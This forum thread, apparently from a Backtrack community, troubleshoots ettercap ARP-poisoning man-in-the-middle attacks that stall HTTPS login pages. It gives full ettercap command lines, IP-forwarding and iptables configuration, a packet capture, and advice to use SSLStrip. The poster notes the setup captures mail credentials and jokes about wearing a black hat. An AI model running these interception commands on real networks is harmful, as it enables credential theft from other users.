Results 1 to 8 of 8

Thread: ETTERCAP - Buggy

  1. #1
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    4

    Question ETTERCAP - Buggy

    Hello fellow Backtrack Users

    I have been holding myself back from asking this question for 7 days now. I appologize if this has already been adressed somewhere else, i have searched above and beyond and to no avail can i solve this issue.

    The issue is as follows...

    I am running Backtrack 4 on the acer aspire one 160GB version
    Backtrack 4 is running from Kingston 8 GB USB with Persistent changes

    I am using ettercap in terminal via command line

    When ever i execute the MiTm Arp Poisoning and try to visit a site that requires a log in such as gmail.com youtube.com hotmail.com etc...

    The browser(IE And Firefox) hangs/lags/ never loads the page, the status bar shows the loading of the page, but never acutally loads it (Vista and XP SP1, SP2, SP3)
    __________________________________________________ _______________
    I have uncommented # the iptables in the etter.conf file

    I have tried " echo 1 > /proc/sys/net/ipv4/ip_foprward"
    and " echo "1" > /proc/sys/net/ipv4/ip_foprward"

    I have tried
    "ettercap -i ath0 -Tq -M arp:remote // -p autoadd"
    "ettercap -i ath0 -Tq -M arp:remote // // -p autoadd"
    "ettercap -i ath0 -Tq -M arp:remote /192.168.1.1/ // -p autoadd"
    "ettercap -i ath0 -Tq -M arp:remote /192.168.1.1/ /192.168.1.100/-p autoadd"

    I have also tried

    "ettercap -i ath0 -Tq -M ARP // -p autoadd"
    "ettercap -i ath0 -Tq -M ARP // // -p autoadd"
    "ettercap -i ath0 -Tq -M ARP /192.168.1.1/ // -p autoadd"
    "ettercap -i ath0 -Tq -M ARP /192.168.1.1/ /192.168.1.100/-p autoadd"
    __________________________________________________ _______________
    I also purchased a USB wireless key (TP-Link TL-Wn321g using the rt73 Chipset), thinking it might have been my integrated card causing the problem

    It sucessfully captures credentials if i use outlook and windows mail...
    I can browse to all other sites, except those requiring a login (as stated above)

    The issue seems to solve itself whenever it decides to (1 out of 20 tries)
    Each try meaning, re setting all pc's, unplugging and pluggin the router (linksys wrt54g)

    Driftnet succesfully captures the pictures

    On my Windows Machines the "arp- a" command in command prompt gives the following result
    __________________________________________________ _______________
    C:\Documents and Settings\Zeus>arp -a

    Interface: 192.168.1.100 --- 0x2
    Internet Address Physical Address Type
    192.168.1.1 00-13-10-99-a9-e6 dynamic
    192.168.1.102 00-23-4e-2d-22-63 dynamic
    192.168.1.103 00-23-4e-2d-22-63 dynamic
    192.168.1.105 00-23-4e-2d-22-63 dynamic
    __________________________________________________ _______________

    When i would press "q" during the arp poisoning attack to stop the attack
    i used to receive the following error

    "iptables v1.4.0: can't initialize iptables" 'nat' : Permission denied (you must be root) Perhaps iptables or your kernel needs to be upgraded"

    i "solved" this by

    by editing the [privs] in the etter.conf file
    ec_uid = 0
    __________________________________________________ ______________
    On the rare occasion that Mitm Arp Poison worked, when i pressed "q" to quit i would receive this error anyways

    "iptables v1.4.0: can't initialize iptables" 'nat' : Permission denied (you must be root) Perhaps iptables or your kernel needs to be upgraded"

    before editing the [privs] in the etter.conf file
    ec_uid = 0
    __________________________________________________ ______________

    I am having a very hard time analysing the source of this problem

    (The browser(IE And Firefox) hangs/lags/ never loads the page, the status bar shows the loading of the page, but never acutally loads it (Vista and XP SP1, SP2, SP3)

    because of the inconsistencies, nothing seems to cause it to work, or not to work...

    If anyone has experienced this Please Post your Success/Failure/Workaround/Solution/Concern
    __________________________________________________ ______________

    Off Subject : This being my first post, i would like to thank all those who participate in this forum, i have been using this forum for over a year now, and have never have had to ask a question because of the excellent support...Thank you for all the great documentation/support/tutorials.
    Keep Up The Good Work Everyone

  2. #2
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Default

    hmm... possibly check for a "1" in /proc/sys/net/ipv4/ip_forward
    dd if=/dev/swc666 of=/dev/wyze

  3. #3
    Junior Member
    Join Date
    Aug 2007
    Posts
    55

    Default

    It's the ssl on the pages that requires login. You need to set up ettercap for mitm SSL.

    edit etter.conf (use locate)
    look for iptables under "Linux" and uncomment both lines
    ettercap -T -q -i whateverinterface -M arp:remote // //

  4. #4
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    1

    Default

    I have the same problem with ettercap in -M arp:remote mode; despite echo 1 > /proc/sys/net/ipv4/ip_forward and configuring etter.conf for ec_uid and ec_gid=0, and redir_command for iptables.
    I mean everything go well with http but traffic is blocked when "test machine" request https for igoogle or facebook. Captures with wireshark see "test machine" TCP requests for https but no answers (see below)
    Did you fix this ?

    Suse 11.1
    ettercap NG-0.7.3

    wireshark captures during https requests from "test machine" (192.168.1.101) :

    No. Source Destination Protocol Info

    673 192.168.1.101 74.125.65.147 TCP ecomm > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    696 192.168.1.101 74.125.65.147 TCP ecomm > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    735 192.168.1.101 74.125.65.147 TCP ecomm > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    820 192.168.1.101 74.125.65.99 TCP stun > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    843 192.168.1.101 74.125.65.99 TCP stun > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    878 192.168.1.101 74.125.65.99 TCP stun > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    950 192.168.1.101 74.125.65.103 TCP twrpc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    969 192.168.1.101 74.125.65.103 TCP twrpc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    1000 192.168.1.101 74.125.65.103 TCP twrpc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    1071 192.168.1.101 74.125.65.104 TCP plethora > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    1072 192.168.1.101 74.125.67.102 TCP nppmp > http [RST, ACK] Seq=638 Ack=126 Win=0 Len=0
    1073 192.168.1.101 74.125.65.100 TCP genisar-port > http [RST, ACK] Seq=725 Ack=268 Win=0 Len=0
    1074 192.168.1.101 74.125.67.102 TCP nppmp > http [RST, ACK] Seq=638 Ack=126 Win=0 Len=0
    1075 192.168.1.101 74.125.65.100 TCP genisar-port > http [RST, ACK] Seq=725 Ack=268 Win=0 Len=0
    1092 192.168.1.101 74.125.65.104 TCP plethora > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    1125 192.168.1.101 74.125.65.104 TCP plethora > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    1188 192.168.1.101 74.125.65.147 TCP cleanerliverc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    1203 192.168.1.101 74.125.65.147 TCP cleanerliverc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    1236 192.168.1.101 74.125.65.147 TCP cleanerliverc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460

  5. #5

    Default

    Ettercap is buggy when used in windows, but its never gone wrong for me in linux.
    Try using SSLStrip.
    http://forums.remote-exploit.org/bac...ettercap+https

    Does that help?
    ~ Have you, g0tmi1k? ~
    :rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:

  6. #6
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    4

    Default Still A No Go

    Thanks to those who replied, i tried your suggestions and unfortuanently i am still getting browser hangs...I also tried the Sslstrip, but as soon as i execute the arpspoof command all the SSL sites hang...I really hope I or anyone else find a solution to this and posts it here...ETTERCAP is wonderfull, but when it doesnt work its nothing more then what could have been, a hope and a dream...

  7. #7
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    4

    Default

    Quote Originally Posted by The_Spirit View Post
    Thanks to those who replied, i tried your suggestions and unfortuanently i am still getting browser hangs...I also tried the Sslstrip, but as soon as i execute the arpspoof command all the SSL sites hang...I really hope I or anyone else find a solution to this and posts it here...ETTERCAP is wonderfull, but when it doesnt work its nothing more then what could have been, a hope and a dream...
    g0tmi1k I put the little pride i had left aside and tried your suggestion AGAIN and all i have to say is WoW...not only did it work, but it worked again and again and again without FAIL

    My hat (the black one of course) off to you

    Thank You

  8. #8

    Default

    Quote Originally Posted by The_Spirit View Post
    g0tmi1k I put the little pride i had left aside and tried your suggestion AGAIN and all i have to say is WoW...not only did it work, but it worked again and again and again without FAIL

    My hat (the black one of course) off to you

    Thank You
    Your more than welcome! Well done for getting it working & trying again!
    Please, put a white hat on
    ~g0tmi1k
    ~ Have you, g0tmi1k? ~
    :rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •